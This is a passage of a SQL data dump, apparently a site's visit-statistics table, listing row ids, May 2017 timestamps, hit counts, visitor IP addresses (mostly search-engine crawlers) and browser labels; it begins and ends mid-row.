94721727,1,0,1,0,'66.249.66.81',''),(109937,1494721982,1,1,0,0,'217.182.132.69','other'),(109938,1494722426,1,1,0,0,'217.182.132.55','other'),(109939,1494722452,1,1,0,0,'157.55.39.152','other'),(109940,1494722754,1,1,0,0,'164.132.161.73','other'),(109941,1494723739,2,2,0,0,'217.182.132.188','other'),(109942,1494723904,1,1,0,0,'164.132.162.160','other'),(109943,1494724034,1,0,1,0,'66.249.76.108',''),(109944,1494724113,1,0,1,0,'66.249.66.81',''),(109945,1494724182,1,1,0,0,'217.182.132.156','other'),(109946,1494724874,1,0,1,0,'68.180.231.24',''),(109947,1494725299,1,1,0,0,'51.255.65.26','other'),(109948,1494725309,1,1,0,0,'51.255.65.64','other'),(109949,1494725696,1,1,0,0,'217.182.132.21','other'),(109950,1494726315,1,1,0,0,'66.249.76.29','chrome'),(109951,1494726371,1,1,0,0,'163.172.108.151','chrome'),(109952,1494726741,1,0,1,0,'66.249.76.107',''),(109953,1494727159,1,1,0,0,'217.182.132.55','other'),(109954,1494728244,1,1,0,0,'217.182.132.146','other'),(109955,1494728245,1,0,1,0,'66.249.66.81',''),(109956,1494728404,1,0,1,0,'68.180.228.186',''),(109957,1494728465,1,1,0,0,'95.134.169.24','chrome'),(109958,1494728752,1,1,0,0,'164.132.161.81','other'),(109959,1494728896,1,1,0,0,'217.182.132.147','other'),(109960,1494729105,1,1,0,0,'217.182.132.150','other'),(109961,1494729201,1,1,0,0,'164.132.161.73','other'),(109962,1494729325,1,0,1,0,'66.249.76.27',''),(109963,1494729606,1,1,0,0,'217.182.132.27','other'),(109964,1494729787,1,1,0,0,'217.182.132.33','other'),(109965,1494729868,1,0,1,0,'66.249.76.28',''),(109966,1494729902,1,1,0,0,'93.158.152.77','other'),(109967,1494729909,1,1,0,0,'141.8.142.38','other'),(109968,1494729914,1,1,0,0,'141.8.132.25','other'),(109969,1494730135,1,0,1,0,'66.249.76.109',''),(109970,1494730197,1,1,0,0,'51.255.65.37','other'),(109971,1494730232,1,1,0,0,'51.255.71.128','other'),(109972,1494730264,1,0,1,0,'66.249.66.180',''),(109973,1494730335,1,1,0,0,'8.29.198.27','other'),(109974,1494730766,1,1,0,0,'164.132.161.94','other'),(109975,1494730784,1,0,1,0,'68.180.231.24',''),(109976,1494731156,2,0,2,0,'66.249.76.29',''),(109977,1494731704,1,1,0,0,'51.255.71.119','other'),(109978,1494731738,1,1,0,0,'66.249.76.109','chrome'),(109979,1494732987,1,1,0,0,'164.132.161.92','other'),(109980,1494733119,1,0,1,0,'66.249.76.107',''),(109981,1494734232,1,1,0,0,'51.255.65.83','other'),(109982,1494734354,1,1,0,0,'51.255.65.6','other'),(109983,1494734426,1,1,0,0,'164.132.161.30','other'),(109984,1494734495,1,1,0,0,'164.132.161.10','other'),(109985,1494734594,1,1,0,0,'51.255.65.75','other'),(109986,1494734629,1,1,0,0,'217.182.132.77','other'),(109987,1494734797,1,1,0,0,'217.182.132.192','other'),(109988,1494735299,1,1,0,0,'51.255.65.19','other'),(109989,1494735419,1,0,1,0,'66.249.76.107',''),(109990,1494735434,1,1,0,0,'164.132.161.11','other'),(109991,1494735452,1,1,0,0,'217.182.132.188','other'),(109992,1494735684,1,1,0,0,'217.182.132.34','other'),(109993,1494735832,1,1,0,0,'51.255.65.14','other'),(109994,1494736006,1,0,1,0,'66.249.76.29',''),(109995,1494736167,1,0,1,0,'68.180.228.186',''),(109996,1494736781,1,1,0,0,'51.255.65.92','other'),(109997,1494737248,1,0,1,0,'66.249.76.29',''),(109998,1494737281,1,0,1,0,'66.249.66.87',''),(109999,1494737560,2,2,0,0,'164.132.161.87','other'),(110000,1494737892,2,2,0,0,'51.255.71.110','other'),(110001,1494738253,1,1,0,0,'51.255.65.48','other'),(110002,1494740072,1,1,0,0,'164.132.161.69','other'),(110003,1494740280,1,1,0,0,'63.243.252.14','other'),(110004,1494740464,1,1,0,0,'164.132.161.22','other'),(110005,1494740490,1,0,1,0,'66.249.66.84',''),(110006,1494740529,29,29,0,0,'62.138.8.181','other'),(110007,1494740995,1,1,0,0,'5.228.8.57','msie'),(110008,1494741055,1,1,0,0,'51.255.65.5','other'),(110009,1494741130,1,1,0,0,'217.182.132.35','other'),(110010,1494741164,1,1,0,0,'8.29.198.25','other'),(110011,1494741753,2,0,2,0,'68.180.228.186',''),(110012,1494741964,1,1,0,0,'217.182.132.152','other'),(110013,1494742329,1,1,0,0,'51.255.65.33','other'),(110014,1494743003,1,1,0,0,'217.182.132.22','other'),(110015,1494743232,1,0,1,0,'66.249.66.87',''),(110016,1494743402,1,1,0,0,'51.255.65.7','other'),(110017,1494743458,1,1,0,0,'217.182.132.183','other'),(110018,1494743669,1,1,0,0,'51.255.65.9','other'),(110019,1494743750,1,1,0,0,'66.102.9.40','chrome'),(110020,1494743809,1,0,1,0,'66.249.76.28',''),(110021,1494743814,1,0,1,0,'66.249.76.27',''),(110022,1494744019,1,0,1,0,'66.249.76.108',''),(110023,1494744038,1,0,1,0,'66.249.76.107',''),(110024,1494744409,1,1,0,0,'66.102.9.29','chrome'),(110025,1494744564,1,1,0,0,'46.48.13.161','chrome'),(110026,1494744602,1,1,0,0,'51.255.65.66','other'),(110027,1494745255,1,0,1,0,'66.249.76.28',''),(110028,1494746123,1,1,0,0,'137.74.207.188','other'),(110029,1494746313,1,1,0,0,'51.255.65.92','other'),(110030,1494746350,1,1,0,0,'51.255.65.16','other'),(110031,1494746369,1,0,1,0,'66.249.76.108',''),(110032,1494746407,2,0,2,0,'66.249.76.28',''),(110033,1494746939,1,1,0,0,'137.74.207.114','other'),(110034,1494746976,1,1,0,0,'164.132.161.39','other'),(110035,1494747308,1,1,0,0,'217.182.132.80','other'),(110036,1494747942,1,0,1,0,'66.249.66.180',''),(110037,1494748146,1,1,0,0,'164.132.161.10','other'),(110038,1494748150,1,1,0,0,'164.132.161.69','other'),(110039,1494748154,1,1,0,0,'164.132.161.60','other'),(110040,1494748229,1,1,0,0,'217.182.132.14','other'),(110041,1494748522,1,1,0,0,'91.221.154.113','other'),(110043,1494748529,1,0,1,0,'66.249.76.108',''),(110044,1494748797,1,0,1,0,'66.249.66.177',''),(110045,1494748980,1,1,0,0,'164.132.161.63','other'),(110046,1494749083,1,0,1,0,'66.249.76.29',''),(110047,1494749120,1,1,0,0,'217.182.132.51','other'),(110048,1494749160,1,1,0,0,'164.132.161.8','other'),(110049,1494749735,1,1,0,0,'192.162.242.133','chrome'),(110050,1494750192,1,1,0,0,'164.132.161.42','other'),(110051,1494750426,1,1,0,0,'164.132.161.95','other'),(110052,1494750504,1,1,0,0,'51.255.71.100','other'),(110053,1494750534,1,1,0,0,'217.182.132.69','other'),(110054,1494750630,1,0,1,0,'66.249.76.29',''),(110055,1494751082,1,1,0,0,'164.132.161.85','other'),(110056,1494751090,1,1,0,0,'137.74.207.116','other'),(110057,1494751095,1,1,0,0,'217.182.132.52','other'),(110058,1494751126,1,1,0,0,'51.255.71.122','other'),(110059,1494751178,1,1,0,0,'217.182.132.21','other'),(110060,1494751445,1,1,0,0,'217.182.132.17','other'),(110061,1494751572,1,1,0,0,'164.132.161.75','other'),(110062,1494751996,1,1,0,0,'8.29.198.25','other'),(110063,1494752200,1,1,0,0,'164.132.161.39','other'),(110064,1494753065,1,1,0,0,'51.255.71.127','other'),(110065,1494753409,1,0,1,0,'66.249.76.108',''),(110066,1494753419,1,1,0,0,'178.154.149.3','other'),(110067,1494753420,1,1,0,0,'178.154.189.16','other'),(110068,1494754114,1,0,1,0,'66.249.76.29',''),(110069,1494754545,2,2,0,0,'192.162.242.133','chrome'),(110070,1494754700,1,1,0,0,'164.132.161.94','other'),(110071,1494755229,1,1,0,0,'217.182.132.151','other'),(110072,1494755235,1,1,0,0,'178.154.189.3','other'),(110073,1494755546,1,0,1,0,'68.180.228.186',''),(110074,1494755581,1,0,1,0,'66.249.66.180',''),(110075,1494755591,2,1,1,0,'157.55.39.152',''),(110076,1494756088,1,1,0,0,'51.255.65.8','other'),(110077,1494756276,1,0,1,0,'66.249.76.108',''),(110078,1494756631,1,1,0,0,'164.132.161.84','other'),(110079,1494756947,2,2,0,0,'162.210.196.100','other'),(110080,1494757337,1,1,0,0,'164.132.161.5','other'),(110081,1494757542,1,1,0,0,'199.16.157.183','other'),(110082,1494757585,1,1,0,0,'217.182.132.61','other'),(110083,1494758222,1,1,0,0,'217.182.132.60','other'),(110084,1494758610,1,0,1,0,'66.249.66.177',''),(110085,1494759391,1,1,0,0,'66.249.93.202','chrome'),(110086,1494759815,1,1,0,0,'217.182.132.149','other'),(110087,1494760041,1,0,1,0,'68.180.228.186',''),(110088,1494760176,1,1,0,0,'51.255.65.42','other'),(110089,1494760333,1,1,0,0,'217.182.132.84','other'),(110090,1494760442,1,0,1,0,'66.249.76.46',''),(110091,1494760459,1,1,0,0,'217.182.132.188','other'),(110092,1494760871,1,1,0,0,'217.182.132.24','other'),(110093,1494761245,1,1,0,0,'217.182.132.56','other'),(110094,1494761962,1,0,1,0,'66.249.76.45',''),(110095,1494762828,1,1,0,0,'8.29.198.26','other'),(110096,1494763222,1,1,0,0,'51.255.71.118','other'),(110097,1494763366,1,1,0,0,'164.132.161.56','other'),(110098,1494763844,1,0,1,0,'66.249.76.45',''),(110099,1494764071,1,0,1,0,'66.249.76.47',''),(110100,1494764184,1,0,1,0,'66.249.76.46',''),(110101,1494764245,1,1,0,0,'217.182.132.66','other'),(110102,1494764342,1,1,0,0,'51.255.65.26','other'),(110103,1494764351,1,0,1,0,'66.249.76.107',''),(110104,1494764586,1,1,0,0,'164.132.161.52','other'),(110105,1494764674,1,1,0,0,'217.182.132.53','other'),(110106,1494764713,1,1,0,0,'5.58.89.172','firefox'),(110107,1494765002,1,1,0,0,'180.97.35.149','firefox'),(110108,1494765128,1,0,1,0,'66.249.76.45',''),(110109,1494765541,1,1,0,0,'217.182.132.241','other'),(110110,1494766002,1,1,0,0,'157.55.39.152','other'),(110111,1494766279,1,1,0,0,'164.132.161.87','other'),(110112,1494766332,1,1,0,0,'164.132.161.52','other'),(110113,1494766889,1,1,0,0,'164.132.161.74','other'),(110114,1494766927,1,1,0,0,'51.255.65.19','other'),(110115,1494766949,1,1,0,0,'217.182.132.157','other'),(110116,1494767004,2,2,0,0,'137.74.207.161','other'),(110117,1494767311,1,0,1,0,'66.249.76.108',''),(110118,1494767409,1,1,0,0,'217.182.132.34','other'),(110119,1494767532,1,1,0,0,'51.255.65.11','other'),(110120,1494768104,1,1,0,0,'217.182.132.170','other'),(110121,1494769147,1,1,0,0,'217.182.132.36','other'),(110122,1494769949,1,1,0,0,'164.132.161.5','other'),(110123,1494770242,1,1,0,0,'51.255.65.53','other'),(110124,1494770347,1,0,1,0,'66.249.76.46',''),(110125,1494770617,1,1,0,0,'217.182.132.73','other'),(110126,1494770759,1,0,1,0,'66.249.76.47',''),(110127,1494770907,1,1,0,0,'51.255.65.10','other'),(110128,1494770916,1,0,1,0,'66.249.76.45',''),(110129,1494770995,1,1,0,0,'217.182.132.78','other'),(110130,1494771012,1,1,0,0,'51.255.65.67','other'),(110131,1494771706,1,1,0,0,'217.182.132.74','other'),(110132,1494771880,1,1,0,0,'51.255.65.58','other'),(110133,1494771967,1,1,0,0,'164.132.164.180','other'),(110134,1494772244,1,0,1,0,'66.249.76.107',''),(110135,1494772513,1,1,0,0,'164.132.161.50','other'),(110136,1494772538,1,1,0,0,'51.255.65.67','other'),(110137,1494772801,1,1,0,0,'164.132.161.88','other'),(110138,1494772873,1,1,0,0,'217.182.132.20','other'),(110139,1494772889,1,0,1,0,'66.249.76.109',''),(110140,1494773036,1,1,0,0,'51.255.71.131','other'),(110141,1494773462,1,0,1,0,'66.249.76.46',''),(110142,1494773671,1,1,0,0,'8.29.198.26','other'),(110143,1494773834,1,1,0,0,'180.76.15.23','other'),(110144,1494773957,1,1,0,0,'217.182.132.188','other'),(110145,1494774343,1,1,0,0,'217.182.132.155','other'),(110146,1494774390,1,0,1,0,'66.249.66.180',''),(110147,1494774855,1,0,1,0,'66.249.66.183',''),(110148,1494775177,1,1,0,0,'51.255.65.20','other'),(110149,1494775183,2,2,0,0,'91.196.178.101','chrome'),(110150,1494775455,1,0,1,0,'68.180.228.186',''),(110151,1494775946,1,0,1,0,'66.249.66.84',''),(110152,1494776144,1,1,0,0,'164.132.161.24','other'),(110153,1494776168,1,1,0,0,'51.255.65.69','other'),(110154,1494776197,1,1,0,0,'217.182.132.34','other'),(110155,1494776402,1,0,1,0,'68.180.228.186',''),(110156,1494776751,1,1,0,0,'193.107.73.73','other'),(110157,1494776790,1,1,0,0,'5.248.133.25','chrome'),(110158,1494776957,1,0,1,0,'66.249.76.109',''),(110159,1494777265,1,1,0,0,'164.132.161.58','other'),(110160,1494777390,1,1,0,0,'217.182.132.183','other'),(110161,1494777496,1,1,0,0,'51.255.65.35','other'),(110162,1494777837,1,1,0,0,'180.76.15.139','other'),(110163,1494778048,1,0,1,0,'66.249.76.45',''),(110164,1494778429,1,1,0,0,'137.74.207.108','other'),(110165,1494778713,1,1,0,0,'217.182.132.53','other'),(110166,1494779077,1,1,0,0,'164.132.161.2','other'),(110167,1494779259,1,0,1,0,'66.249.76.45',''),(110168,1494780445,1,1,0,0,'51.255.65.89','other'),(110169,1494780598,1,0,1,0,'66.249.66.183',''),(110170,1494780804,1,1,0,0,'164.132.161.25','other'),(110171,1494781093,1,1,0,0,'217.182.132.190','other'),(110172,1494781377,1,1,0,0,'180.76.15.6','other'),(110173,1494782293,1,1,0,0,'164.132.161.20','other'),(110174,1494782412,1,0,1,0,'66.249.66.81',''),(110175,1494782744,1,1,0,0,'168.235.206.197','other'),(110176,1494782842,1,1,0,0,'164.132.161.84','other'),(110177,1494782947,1,1,0,0,'5.255.253.54','other'),(110178,1494783574,1,1,0,0,'178.95.67.51','firefox'),(110179,1494784159,1,0,1,0,'66.249.76.108',''),(110180,1494784213,1,1,0,0,'51.255.65.14','other'),(110181,1494784500,1,1,0,0,'8.29.198.27','other'),(110182,1494784507,1,1,0,0,'51.255.65.25','other'),(110183,1494784785,1,1,0,0,'5.255.253.63','other'),(110184,1494785168,1,1,0,0,'164.132.161.86','other'),(110185,1494786030,1,1,0,0,'217.182.132.27','other'),(110186,1494786097,1,0,1,0,'66.249.76.45',''),(110187,1494786104,1,0,1,0,'66.249.66.84',''),(110188,1494786181,1,1,0,0,'157.55.39.212','other'),(110189,1494786899,1,1,0,0,'51.255.65.77','other'),(110190,1494787872,1,1,0,0,'164.132.161.70','other'),(110191,1494788617,1,1,0,0,'217.182.132.150','other'),(110192,1494788768,1,1,0,0,'164.132.161.94','other'),(110193,1494789218,1,0,1,0,'66.249.76.47',''),(110194,1494789239,1,1,0,0,'51.255.65.93','other'),(110195,1494789532,1,1,0,0,'51.255.65.2','other'),(110196,1494789774,1,1,0,0,'217.182.132.33','other'),(110197,1494789908,1,1,0,0,'164.132.161.92','other'),(110198,1494790200,1,1,0,0,'51.255.65.55','other'),(110199,1494790441,1,1,0,0,'217.182.132.83','other'),(110200,1494790732,1,1,0,0,'151.80.27.118','other'),(110201,1494791274,1,1,0,0,'51.255.65.47','other'),(110202,1494791826,1,1,0,0,'164.132.161.43','other'),(110203,1494792550,1,1,0,0,'191.101.153.217','other'),(110204,1494792719,1,1,0,0,'164.132.161.47','other'),(110205,1494792998,1,1,0,0,'51.255.65.90','other'),(110206,1494793006,1,1,0,0,'164.132.161.87','other'),(110207,1494793158,1,1,0,0,'141.8.142.15','other'),(110208,1494793208,1,1,0,0,'54.165.59.7','other'),(110209,1494794399,1,0,1,0,'66.249.76.107',''),(110210,1494794640,1,0,1,0,'66.249.76.45',''),(110211,1494794651,1,1,0,0,'217.182.132.94','other'),(110212,1494794674,1,0,1,0,'66.249.66.81',''),(110213,1494794739,1,1,0,0,'164.132.161.76','other'),(110214,1494794902,1,1,0,0,'51.255.65.21','other'),(110215,1494795144,1,1,0,0,'164.132.161.86','other'),(110216,1494795191,1,1,0,0,'216.244.66.237','other'),(110217,1494795339,1,1,0,0,'8.29.198.25','other'),(110218,1494795617,1,0,1,0,'68.180.228.186',''),(110219,1494795659,1,0,1,0,'66.249.76.47',''),(110220,1494795849,1,1,0,0,'51.255.65.59','other'),(110221,1494797579,1,0,1,0,'207.46.13.149',''),(110222,1494797582,1,0,1,0,'68.180.228.186',''),(110223,1494797712,1,1,0,0,'66.102.9.40','chrome'),(110224,1494797767,1,1,0,0,'66.102.9.38','chrome'),(110225,1494797880,1,1,0,0,'217.182.132.55','other'),(110226,1494798367,1,1,0,0,'51.255.65.24','other'),(110227,1494798802,1,0,1,0,'66.249.76.45',''),(110228,1494798828,1,0,1,0,'66.249.76.46',''),(110229,1494798862,1,1,0,0,'51.255.65.28','other'),(110230,1494799037,1,1,0,0,'164.132.161.36','other'),(110231,1494799097,1,1,0,0,'164.132.161.3','other'),(110232,1494799634,1,1,0,0,'66.249.76.108','chrome'),(110233,1494799635,1,1,0,0,'66.249.76.109','chrome'),(110234,1494799857,1,1,0,0,'51.255.65.38','other'),(110235,1494800185,1,1,0,0,'164.132.161.94','other'),(110236,1494800189,1,1,0,0,'217.182.132.91','other'),(110237,1494800281,1,1,0,0,'51.255.65.66','other'),(110238,1494800409,1,1,0,0,'51.255.65.80','other'),(110239,1494800500,1,1,0,0,'217.182.132.174','other'),(110240,1494800688,1,1,0,0,'51.255.65.48','other'),(110241,1494801465,1,1,0,0,'164.132.161.2','other'),(110242,1494802773,2,2,0,0,'54.165.59.7','other'),(110243,1494802870,1,0,1,0,'66.249.76.108',''),(110244,1494802993,1,1,0,0,'217.182.132.191','other'),(110245,1494803192,1,1,0,0,'164.132.161.57','other'),(110246,1494803944,1,1,0,0,'217.182.132.193','other'),(110247,1494804289,1,1,0,0,'66.249.76.46','chrome'),(110248,1494804574,1,1,0,0,'137.74.201.99','other'),(110249,1494804930,1,1,0,0,'217.182.132.4','other'),(110250,1494805740,1,1,0,0,'217.182.132.173','other'),(110251,1494805750,2,0,2,0,'66.249.66.180',''),(110252,1494805785,1,0,1,0,'66.249.76.107',''),(110253,1494806178,1,1,0,0,'8.29.198.26','other'),(110254,1494806645,1,1,0,0,'35.184.189.105','other'),(110255,1494806691,1,1,0,0,'51.255.65.72','other'),(110256,1494806871,2,2,0,0,'95.213.141.126','opera'),(110257,1494807150,1,1,0,0,'217.182.132.52','other'),(110258,1494807202,1,1,0,0,'164.132.161.28','other'),(110259,1494807315,1,1,0,0,'217.182.132.21','other'),(110260,1494807794,1,1,0,0,'164.132.161.15','other'),(110261,1494807990,1,1,0,0,'217.182.132.77','other'),(110262,1494808226,1,1,0,0,'51.255.65.88','other'),(110263,1494808568,1,1,0,0,'164.132.161.45','other'),(110264,1494808613,1,0,1,0,'66.249.76.46',''),(110265,1494808888,1,0,1,0,'66.249.76.45',''),(110266,1494808909,1,1,0,0,'164.132.161.47','other'),(110267,1494808932,1,1,0,0,'54.165.59.7','other'),(110268,1494809004,1,1,0,0,'207.46.13.149','other'),(110269,1494809289,1,1,0,0,'51.255.65.69','other'),(110270,1494809580,1,1,0,0,'137.74.207.120','other'),(110271,1494810434,1,0,1,0,'66.249.76.108',''),(110272,1494810469,1,0,1,0,'68.180.231.24',''),(110273,1494810886,1,1,0,0,'216.244.66.237','other'),(110274,1494811422,1,1,0,0,'164.132.161.36','other'),(110275,1494811431,1,1,0,0,'164.132.161.18','other'),(110276,1494811463,1,1,0,0,'164.132.161.28','other'),(110277,1494812120,1,1,0,0,'137.74.201.100','other'),(110278,1494812210,1,1,0,0,'141.8.142.154','other'),(110279,1494812288,1,1,0,0,'217.182.132.58','other'),(110280,1494812448,1,1,0,0,'54.165.59.7','other'),(110281,1494812793,1,1,0,0,'141.8.142.164','other'),(110282,1494813126,1,0,1,0,'66.249.66.84',''),(110283,1494813127,1,1,0,0,'217.182.132.154','other'),(110284,1494813910,1,1,0,0,'51.255.65.39','other'),(110285,1494813980,1,1,0,0,'164.132.162.188','other'),(110286,1494814649,2,0,2,0,'66.249.76.109',''),(110287,1494814667,1,0,1,0,'66.249.76.46',''),(110288,1494815123,1,0,1,0,'66.249.66.81',''),(110289,1494815142,2,0,2,0,'66.249.76.108',''),(110290,1494815148,1,0,1,0,'66.249.76.107',''),(110291,1494815401,1,1,0,0,'51.255.65.32','other'),(110292,1494815505,1,1,0,0,'164.132.161.46','other'),(110293,1494815614,1,1,0,0,'164.132.161.88','other'),(110294,1494815625,1,1,0,0,'217.182.132.193','other'),(110295,1494815903,1,1,0,0,'51.255.65.68','other'),(110296,1494816209,1,1,0,0,'51.255.71.126','other'),(110297,1494816641,1,0,1,0,'66.249.66.183',''),(110298,1494816711,1,1,0,0,'51.255.65.60','other'),(110299,1494816808,1,1,0,0,'51.255.65.34','other'),(110300,1494816811,1,1,0,0,'54.165.59.7','other'),(110301,1494817014,1,1,0,0,'8.29.198.25','other'),(110302,1494817359,1,1,0,0,'157.55.39.212','other'),(110303,1494817808,1,1,0,0,'51.255.65.73','other'),(110304,1494818011,1,1,0,0,'54.165.59.7','other'),(110305,1494818309,1,0,1,0,'66.249.76.46',''),(110306,1494818990,1,1,0,0,'141.8.132.25','other'),(110307,1494819540,1,0,1,0,'66.249.76.109',''),(110308,1494819645,1,0,1,0,'66.249.76.107',''),(110309,1494820085,1,1,0,0,'51.255.71.110','other'),(110310,1494820105,1,1,0,0,'54.165.59.7','other'),(110311,1494820475,1,1,0,0,'51.255.71.125','other'),(110312,1494820569,1,1,0,0,'217.182.132.192','other'),(110313,1494820732,1,1,0,0,'51.255.65.69','other'),(110314,1494820809,1,1,0,0,'157.55.39.152','other'),(110315,1494820839,1,1,0,0,'51.255.65.5','other'),(110316,1494820997,1,0,1,0,'207.46.13.67',''),(110317,1494821087,1,0,1,0,'66.249.76.109',''),(110318,1494821175,1,0,1,0,'66.249.66.180',''),(110319,1494821228,1,1,0,0,'51.255.65.64','other'),(110320,1494821340,1,0,1,0,'68.180.228.186',''),(110321,1494821895,1,1,0,0,'164.132.161.77','other'),(110322,1494822039,1,1,0,0,'217.182.132.52','other'),(110323,1494822743,1,1,0,0,'217.182.132.173','other'),(110324,1494822808,1,1,0,0,'54.165.59.7','other'),(110325,1494822891,1,1,0,0,'164.132.161.88','other'),(110326,1494822916,1,1,0,0,'164.132.161.14','other'),(110327,1494822971,1,1,0,0,'91.196.178.66','firefox'),(110328,1494823335,1,1,0,0,'217.182.132.153','other'),(110329,1494823732,1,1,0,0,'217.182.132.69','other'),(110330,1494824155,1,1,0,0,'207.46.13.67','other'),(110331,1494824431,1,1,0,0,'164.132.162.158','other'),(110332,1494824654,1,1,0,0,'164.132.161.74','other'),(110333,1494824797,1,1,0,0,'164.132.161.46','other'),(110334,1494824935,1,1,0,0,'164.132.161.48','other'),(110335,1494825559,1,1,0,0,'217.182.132.176','other'),(110336,1494825846,1,0,1,0,'66.249.66.87',''),(110337,1494825854,1,0,1,0,'66.249.76.45',''),(110338,1494826511,1,1,0,0,'91.196.178.68','chrome'),(110339,1494826753,1,1,0,0,'217.182.132.192','other'),(110340,1494826926,1,1,0,0,'178.92.74.146','chrome'),(110341,1494827015,1,1,0,0,'164.132.161.74','other'),(110342,1494827179,1,1,0,0,'51.255.65.27','other'),(110343,1494827571,2,2,0,0,'54.165.59.7','other'),(110344,1494827840,1,1,0,0,'8.29.198.25','other'),(110345,1494827920,1,1,0,0,'164.132.161.4','other'),(110346,1494827943,3,0,3,0,'66.249.76.47',''),(110347,1494828139,1,1,0,0,'91.196.178.71','chrome'),(110348,1494828158,1,1,0,0,'164.132.161.33','other'),(110349,1494828698,1,0,1,0,'68.180.228.186',''),(110350,1494828762,2,2,0,0,'51.255.65.46','other'),(110351,1494829242,1,0,1,0,'66.249.76.108',''),(110352,1494829354,1,1,0,0,'164.132.161.6','other'),(110353,1494829525,1,1,0,0,'51.255.65.8','other'),(110354,1494829526,1,1,0,0,'51.255.71.112','other'),(110355,1494829580,1,1,0,0,'91.196.178.71','chrome'),(110356,1494829697,1,1,0,0,'164.132.161.4','other'),(110357,1494829793,1,1,0,0,'51.255.71.117','other'),(110358,1494830034,1,1,0,0,'35.184.189.105','other'),(110359,1494830074,1,1,0,0,'66.102.9.40','chrome'),(110360,1494830226,2,2,0,0,'54.165.59.7','other'),(110361,1494830381,1,1,0,0,'91.196.178.68','chrome'),(110362,1494830531,1,1,0,0,'37.54.169.213','firefox'),(110363,1494830593,1,1,0,0,'164.132.162.160','other'),(110364,1494830806,1,1,0,0,'164.132.161.63','other'),(110365,1494830850,1,0,1,0,'207.46.13.149',''),(110366,1494830989,1,1,0,0,'217.182.132.179','other'),(110367,1494831297,1,1,0,0,'91.196.177.26','chrome'),(110368,1494831367,1,0,1,0,'66.249.66.183',''),(110369,1494831467,12,12,0,0,'88.198.16.12','other'),(110370,1494831531,1,1,0,0,'217.182.132.63','other'),(110371,1494831662,1,1,0,0,'51.255.71.110','other'),(110372,1494831740,1,0,1,0,'66.249.76.107',''),(110373,1494831753,1,0,1,0,'40.77.167.59',''),(110374,1494831764,1,1,0,0,'137.74.201.99','other'),(110375,1494831921,1,1,0,0,'51.255.65.7','other'),(110376,1494832160,1,1,0,0,'91.196.178.71','firefox'),(110377,1494832178,1,1,0,0,'164.132.161.61','other'),(110378,1494832204,1,0,1,0,'68.180.228.186',''),(110379,1494832331,1,1,0,0,'89.28.201.171','chrome'),(110380,1494832609,1,0,1,0,'66.249.76.109',''),(110381,1494832668,1,0,1,0,'66.249.76.47',''),(110382,1494832976,1,0,1,0,'66.249.66.180',''),(110383,1494833752,2,2,0,0,'54.165.59.7','other'),(110384,1494833922,1,1,0,0,'91.196.178.69','firefox'),(110385,1494834465,1,1,0,0,'178.92.37.17','opera'),(110386,1494834500,1,1,0,0,'151.80.27.118','other'),(110387,1494834780,1,1,0,0,'217.182.132.181','other'),(110388,1494835092,1,0,1,0,'66.249.76.45',''),(110389,1494835171,1,1,0,0,'137.74.207.101','other'),(110390,1494835535,1,1,0,0,'178.92.37.17','opera'),(110391,1494835638,2,0,2,0,'68.180.228.186',''),(110392,1494835657,1,1,0,0,'51.255.65.83','other'),(110393,1494835744,2,2,0,0,'217.182.132.21','other'),(110394,1494835815,2,2,0,0,'91.196.178.67','chrome'),(110395,1494835885,1,1,0,0,'51.255.65.5','other'),(110396,1494836028,1,1,0,0,'51.255.65.26','other'),(110397,1494836171,1,0,1,0,'66.249.76.107',''),(110398,1494836424,1,1,0,0,'66.249.93.204','chrome'),(110399,1494837253,2,2,0,0,'162.210.196.97','other'),(110400,1494837321,1,1,0,0,'51.255.65.71','other'),(110401,1494837354,1,1,0,0,'164.132.161.23','other'),(110402,1494837512,1,1,0,0,'217.182.132.25','other'),(110403,1494838245,1,0,1,0,'66.249.76.47',''),(110404,1494838676,1,1,0,0,'8.29.198.25','other'),(110405,1494838961,1,1,0,0,'91.196.178.69','firefox'),(110406,1494839087,1,1,0,0,'91.196.178.71','chrome'),(110407,1494839192,1,1,0,0,'141.8.132.43','other'),(110408,1494839404,1,1,0,0,'130.180.220.136','firefox'),(110409,1494839954,1,1,0,0,'91.196.178.131','firefox'),(110410,1494839981,1,1,0,0,'51.255.65.62','other'),(110411,1494840093,2,0,2,0,'66.249.76.108',''),(110412,1494840183,1,0,1,0,'66.249.66.84',''),(110413,1494840196,1,1,0,0,'217.182.132.85','other'),(110414,1494840397,1,1,0,0,'51.255.65.15','other'),(110415,1494840606,1,0,1,0,'40.77.167.59',''),(110416,1494840620,1,1,0,0,'164.132.161.48','other'),(110417,1494840750,1,1,0,0,'51.255.71.100','other'),(110418,1494840764,1,1,0,0,'51.255.65.60','other'),(110419,1494841181,1,1,0,0,'216.244.66.237','other'),(110420,1494841653,1,1,0,0,'51.255.65.78','other'),(110421,1494842044,1,1,0,0,'51.255.65.40','other'),(110422,1494842082,1,0,1,0,'66.249.66.183',''),(110423,1494842228,1,1,0,0,'91.196.178.71','firefox'),(110424,1494842337,1,1,0,0,'217.182.132.176','other'),(110425,1494842531,1,1,0,0,'51.255.71.122','other'),(110426,1494842637,1,1,0,0,'37.9.113.5','other'),(110427,1494843007,1,1,0,0,'66.249.76.47','chrome'),(110428,1494844254,1,1,0,0,'164.132.161.78','other'),(110429,1494844337,1,1,0,0,'217.182.132.193','other'),(110430,1494844422,1,1,0,0,'51.255.65.96','other'),(110431,1494844711,1,1,0,0,'91.196.178.168','chrome'),(110432,1494844913,1,1,0,0,'51.255.65.62','other'),(110433,1494845307,1,1,0,0,'137.74.207.102','other'),(110434,1494845968,4,4,0,0,'144.76.38.40','other'),(110435,1494846028,1,1,0,0,'95.134.117.1','chrome'),(110436,1494846263,1,1,0,0,'164.132.161.5','other'),(110437,1494846438,1,1,0,0,'51.255.71.125','other'),(110438,1494846461,1,0,1,0,'66.249.66.177',''),(110439,1494846567,1,1,0,0,'95.135.127.122','chrome'),(110440,1494847343,1,0,1,0,'68.180.228.186',''),(110441,1494847504,1,1,0,0,'66.249.76.108','chrome'),(110442,1494847835,1,1,0,0,'91.196.178.65','chrome'),(110443,1494848068,1,1,0,0,'164.132.161.18','other'),(110444,1494848096,2,2,0,0,'37.55.150.242','chrome'),(110445,1494848116,1,1,0,0,'51.255.65.50','other'),(110446,1494848236,1,1,0,0,'164.132.161.66','other'),(110447,1494848498,1,1,0,0,'51.255.65.55','other'),(110448,1494848518,1,1,0,0,'217.182.132.30','other'),(110449,1494848885,1,1,0,0,'164.132.161.75','other'),(110450,1494849148,1,0,1,0,'66.249.76.107',''),(110451,1494849402,1,1,0,0,'137.74.207.120','other'),(110452,1494849509,1,1,0,0,'8.29.198.25','other'),(110453,1494849557,1,0,1,0,'66.249.76.108',''),(110454,1494850292,2,0,2,0,'66.249.76.107',''),(110455,1494850789,1,1,